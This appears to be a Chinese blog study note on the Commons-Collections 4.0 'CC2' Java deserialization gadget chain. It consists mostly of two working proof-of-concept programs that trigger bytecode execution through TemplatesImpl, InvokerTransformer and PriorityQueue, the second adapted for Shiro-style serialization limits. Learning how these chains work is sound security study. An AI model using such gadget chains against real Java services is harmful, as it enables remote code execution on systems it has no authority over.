环境配置:
- Commons-Collections 4.0
- jdk8u65
maven中导入坐标:
1
2
3
4
5
| <dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
|
CC2链分析:
首先分析这条链子,要先明白它存在的意义。
cc2实际上是基于cc4的。
其实本人在cc2中无意中编写类似cc2的代码,cc2主要是调用了newTransformer方法,而不是调用TrAXFilter方法。
poc如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| public static void main(String[] args) throws Exception {
TemplatesImpl templates = new TemplatesImpl();
byte[] bytes = Files.readAllBytes(Paths.get("D:\\Language\\Java\\java_code\\Security\\serialize\\cc3\\target\\classes\\Calc.class"));
setFiled(templates, "_name", "Calc");
setFiled(templates, "_bytecodes", new byte[][]{bytes});
setFiled(templates, "_tfactory", new TransformerFactoryImpl());
Transformer[] transformers = {
new ConstantTransformer(templates),
new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{})
};
ChainedTransformer<Object> chainedTransformer = new ChainedTransformer<>(transformers);
TransformingComparator transformingComparator = new TransformingComparator<>(new ChainedTransformer<>());
PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);
priorityQueue.add(1);
priorityQueue.add(1);
Class<? extends TransformingComparator> transformingComparatorClass = transformingComparator.getClass();
Field transformingComparatorClassDeclaredField = transformingComparatorClass.getDeclaredField("transformer");
transformingComparatorClassDeclaredField.setAccessible(true);
transformingComparatorClassDeclaredField.set(transformingComparator,chainedTransformer);
SerializeUtil.serialize(priorityQueue);
SerializeUtil.unSerialize();
}
public static void setFiled(TemplatesImpl templates, String filedName, Object value) throws Exception {
Field declaredField = templates.getClass().getDeclaredField(filedName);
declaredField.setAccessible(true);
declaredField.set(templates, value);
}
|
对于一些情况下,序列化时不能传入数组,如shiro反序列化中重写的序列化的方式,我们传入Transformer是不能序列化的。
因此我们需要改写以下,使用InvokerTransformer构造方法,调用他的transform方法,从而调用newTransformer方法。这add方法中就是间接调用了transform方法。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| public static void main(String[] args) throws Exception {
TemplatesImpl templates = new TemplatesImpl();
byte[] bytes = Files.readAllBytes(Paths.get("D:\\Language\\Java\\java_code\\Security\\serialize\\cc3\\target\\classes\\Calc.class"));
setFiled(templates, "_name", "Calc");
setFiled(templates, "_bytecodes", new byte[][]{bytes});
setFiled(templates, "_tfactory", new TransformerFactoryImpl());
InvokerTransformer invokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});
TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);
priorityQueue.add(templates);
priorityQueue.add(templates);
Class<? extends TransformingComparator> transformingComparatorClass = transformingComparator.getClass();
Field transformingComparatorClassDeclaredField = transformingComparatorClass.getDeclaredField("transformer");
transformingComparatorClassDeclaredField.setAccessible(true);
transformingComparatorClassDeclaredField.set(transformingComparator,invokerTransformer);
SerializeUtil.serialize(priorityQueue);
SerializeUtil.unSerialize();
}
public static void setFiled(TemplatesImpl templates, String filedName, Object value) throws Exception {
Field declaredField = templates.getClass().getDeclaredField(filedName);
declaredField.setAccessible(true);
declaredField.set(templates, value);
}
|